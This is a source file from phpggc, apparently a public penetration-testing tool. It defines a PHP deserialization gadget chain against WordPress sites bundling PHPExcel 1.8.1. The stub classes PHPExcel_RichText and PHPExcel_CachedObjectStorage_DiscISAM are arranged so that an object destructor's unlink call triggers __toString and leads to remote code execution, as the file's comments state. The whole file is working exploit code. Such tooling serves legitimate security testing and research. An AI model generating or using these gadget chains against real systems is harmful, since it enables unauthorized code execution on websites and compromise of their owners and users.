Codebase list phpggc / a334346 gadgetchains / WordPress / PHPExcel / RCE / 4 / gadgets.php
a334346

Tree @a334346 (Download .tar.gz)

gadgets.php @a334346raw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<?php

require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');

# https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php
class PHPExcel_RichText {
    private $_richTextElements;

    public function __construct($richTextElements) {
        $this->_richTextElements = $richTextElements;
    }

    /*
    public function getPlainText() {
        // Return value
        $returnValue = '';

        // Loop through all PHPExcel_RichText_ITextElement
        foreach ($this->_richTextElements as $text) {
            $returnValue .= $text->getText();
        }

        // Return
        return $returnValue;
    }

    public function __toString() {
        return $this->getPlainText();
    }
    */
}

# https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
class PHPExcel_CachedObjectStorage_DiscISAM {
    private $_fileName = null;
    private $_fileHandle = 42;

    public function __construct($filePath) {
        $this->_fileName = $filePath;
    }

    /*
    public function __destruct() {
        if (!is_null($this->_fileHandle)) {
            fclose($this->_fileHandle); // Will only produce a warning
            unlink($this->_fileName); // Passing an object will call its __toString(), triggering the RCE
        }
        $this->fileHandle = null;
    }
    */
}